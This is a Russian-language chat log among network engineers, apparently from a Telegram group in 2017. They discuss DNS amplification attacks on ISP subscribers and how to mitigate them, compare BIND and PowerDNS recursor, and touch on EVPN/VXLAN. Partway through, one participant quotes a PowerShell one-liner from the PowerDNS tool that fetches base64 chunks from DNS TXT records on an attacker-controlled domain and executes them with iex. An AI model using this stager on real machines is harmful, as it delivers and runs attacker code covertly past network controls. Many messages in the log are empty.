
Anton
08.09.2017
12:13:40

Vladislav
08.09.2017
12:13:57
кого-то снаружи через бордер :D

Dmitry
08.09.2017
12:14:00

Google

Anton
08.09.2017
12:14:10

kino
08.09.2017
12:14:48

Dmitry
08.09.2017
12:14:58

Anton
08.09.2017
12:15:17
на кого амплификейшон?

Dmitry
08.09.2017
12:15:42
на шлюз?
http://whatis.techtarget.com/definition/DNS-amplification-attack

Anton
08.09.2017
12:15:55
да я знаю что такое амплификейшон
атака на кого?

Dmitry
08.09.2017
12:16:14
да хоть на кого. на ник ру недавно была
это ботсеть
сидишь такой и видишь как сабскрайбер 6000 запросов херачит
1... 2... 20... ой - днс тупит.. ой заббикс завизжал.. о! Бан сработал - полегчало...

Anton
08.09.2017
12:18:54
чёт тут намешено куча всего, куча сессий, амплификейшон, бот сеть

Google

Dmitry
08.09.2017
12:19:16
это спросили просто кого от чего защищают

Anton
08.09.2017
12:19:27
уязвимый днс, например те что на роутерах стоят не обязательно должны быть частью бот сетей
а если они часть, то там не обязательно днс-амплификейшон, там что угодно можно, хоть син-флуд, хоть тупо канал забивать одной сессией

Dmitry
08.09.2017
12:20:42

Anton
08.09.2017
12:21:41
кто нить понял, что там за скрипт, который повершел через днс запросы выполняет?
какая-то бредятина

Dmitry
08.09.2017
12:22:05
подробнее?

Anton
08.09.2017
12:22:14
зачем выполнять повершел на компе, на котором уже питон есть
ну последняя новость на линкмиап канале

Dmitry
08.09.2017
12:22:35
а - ща схожу

kino
08.09.2017
12:24:44

Anton
08.09.2017
12:25:00
Пятница на дворе и хочется чего-то такого этакого.
И в качестве этакого сегодня выступает старая шутка про перебор двигателя через выхлопную трубу. А именно: как с помощью питона пропихнуть powershell скрипт используя DNS туннель.
Некоторые судари явно знают толк…
Главный признак гениальности – простота, наличествует, ибо скрипт дуболомен до прекрасного. Нарезаем скрипт на кусочки по 250 символов, распихиваем в TXT записи, целевая машина начинает запрашивать TXT записи и вуаля!
Всем разобраться как работает и доложить Наташе. Там сотни строчек нет, а Наташа будет рада за взрощённых питонщиков.
https://github.com/mdsecactivebreach/PowerDNS
их обычно тут удаляют

Dmitry
08.09.2017
12:25:10
https://t.me/linkmeup_podcast
ну поглядел... ничего нового....
я помню как any от клиентов закрывал

kino
08.09.2017
12:26:37
ну на винде нет питону из коробке

Dmitry
08.09.2017
12:27:50
на софт-fw бывает
ну я скрипт не смотрел

Google

One
08.09.2017
12:36:55

Dmitry
08.09.2017
12:38:01
у нас это было настолько бедой - что юзерам выдавали гугловские днсы

kino
08.09.2017
12:38:18

Anton
08.09.2017
12:38:49
ну я и говорю
зачем нужен павершел?
можно же так же на питоне выполнять

One
08.09.2017
12:39:50
вообще, настраивалось так - fail2ban как индикатор, отсекалось на BRAS'е аклом, оповещался колл центр, он звонил абоненту и отправлял письмо о проблеме

Anton
08.09.2017
12:39:58
ещё и скапи залупили
он же будет вместе с отновным dns replay ещё и icmp unreacheble отправлять
че для питона нету днс сервера нормального?
ну или просто сокет голый

kino
08.09.2017
12:41:03
ну я и говорю
ты скрипт читал? скрипт выполняеться на машине атакующего чтобы загрузить повешелл скрипт для жертвы,которая его потом скачает

Dmitry
08.09.2017
12:41:07
ну я таких в дроп молча. превысил - начались дропы. если совсем дропы - у абона нихера не робит - он звонит и пищит.
только пока не приделано оповещение КЦ. там в црм надо писать. а я не программист

Anton
08.09.2017
12:41:59

kino
08.09.2017
12:42:03

One
08.09.2017
12:42:15

Dmitry
08.09.2017
12:43:07
да и некогда нам звонить... много их.. а как выйдет какое говно....

kino
08.09.2017
12:43:44
а как скачает то?
вот так "for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.%s')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))" % (str(len(chunks)), domain)

Google

One
08.09.2017
12:44:09
10 минут

Anton
08.09.2017
12:44:30

Dmitry
08.09.2017
12:44:31

kino
08.09.2017
12:45:24

One
08.09.2017
12:45:32
тут года полтора назад вконтактик амплифаерили, вот пришлось сделать

Admin
ERROR: S client not available

Dmitry
08.09.2017
12:46:20
я помню как бинды валились.. потом восьмерки поставил товарищ-админ. народ ныл - все тупит. там 40мс отклик.. потом он уволился и меня допустили до сети) и я поверднс-рекурсор курить начал.

kino
08.09.2017
12:46:38

One
08.09.2017
12:47:01
бинды норм тащат, что их менять?
на старых машинках еще и лучше чем повер

Dmitry
08.09.2017
12:47:47

One
08.09.2017
12:48:11
может донастроить нужно было
ну тут чужое хозяйство, каждый сам себе молоток по руке выбирает

Dmitry
08.09.2017
12:49:10
может донастроить нужно было
да там как не строй... точнее не падал: тупил. Адски! а рекурсор работает - оччень редко когда на 5 минут притупит до 40МС и все
на авторитарниках - отлично пашут!
может и бинды конечно.. я попробую - но шеф меня отговаривал от такого занятия

One
08.09.2017
12:51:53
на стенде поиграйся просто, нет там существенной разницы в скорости
повер мне не понравлся тем, что при пиковой нагрузке тупо встает и все
а бинд меееееедлееееенноооо отвечает

Google

Dmitry
08.09.2017
12:53:22
у меня повер ни разу не вставал
вот бинд и отвечал
мееедленно

andrew
08.09.2017
16:17:11
Может пора делать кластер из биндов :)
Мне советовали Gentoo+Bind для быстрых откликов. На сайте рейтинга с тестами, связка Gentoo+Bind была на 1 месте.
https://indico.dns-oarc.net/event/8/contribution/5/material/slides/0.ppt

Anton
08.09.2017
18:21:01
Эммм... а год-то тестов какой? Может всё уже давно поменялось...

Innokentiy
08.09.2017
18:28:55
да ну, разве что-то могло с 2007 года в IT поменяться? чушь

andrew
09.09.2017
07:23:57
Эммм... а год-то тестов какой? Может всё уже давно поменялось...
Я узнал о рейтингах от Михаила Варакина в 2011г на кусах Специалист при МГТУ им. Баумана. Может у него есть данные свежее.
М. Варакин сейчас курс ведет интересный с: Ansible, Zabbix, Git и контейнерами Linux http://miaton.ru/course/linux-dlya-windows-administratora-uroven-2
В компании держали сайт на Gentoo (nginx+MySQL+чат, + .., + .., +.., + ..), но сайт - это много компонент, а вот Bind проще как-то звучит.
И кстати забили на Gentoo и переделали всё на Debian. Gentoo - компиляй, компиляй, компиляй.


Alexei
09.09.2017
10:14:37
Я узнал о рейтингах от Михаила Варакина в 2011г на кусах Специалист при МГТУ им. Баумана. Может у него есть данные свежее.
М. Варакин сейчас курс ведет интересный с: Ansible, Zabbix, Git и контейнерами Linux http://miaton.ru/course/linux-dlya-windows-administratora-uroven-2
В компании держали сайт на Gentoo (nginx+MySQL+чат, + .., + .., +.., + ..), но сайт - это много компонент, а вот Bind проще как-то звучит.
И кстати забили на Gentoo и переделали всё на Debian. Gentoo - компиляй, компиляй, компиляй.
Зачётный препод.

bormoglotx
09.09.2017
10:41:20
Коллеги, у кого есть датацентры с evpn/vxlan???
Интересует что используете для overlay/underlay: ebgp/ebgp, ebgp/ibgp, igp/ibgp...

Ruslan
09.09.2017
10:54:05
а у тебя какие свичи и облако?

bormoglotx
09.09.2017
10:55:04
Свичи